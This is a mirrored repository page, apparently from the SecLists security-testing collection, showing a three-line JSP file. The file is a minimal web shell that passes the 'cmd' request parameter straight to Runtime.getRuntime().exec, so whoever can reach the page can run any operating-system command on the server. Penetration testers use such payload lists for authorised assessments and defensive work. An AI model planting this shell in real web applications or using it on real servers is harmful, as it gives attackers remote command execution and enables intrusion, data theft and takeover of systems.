mirror of
https://github.com/danielmiessler/SecLists
synced 2026-05-02 20:01:51 +02:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|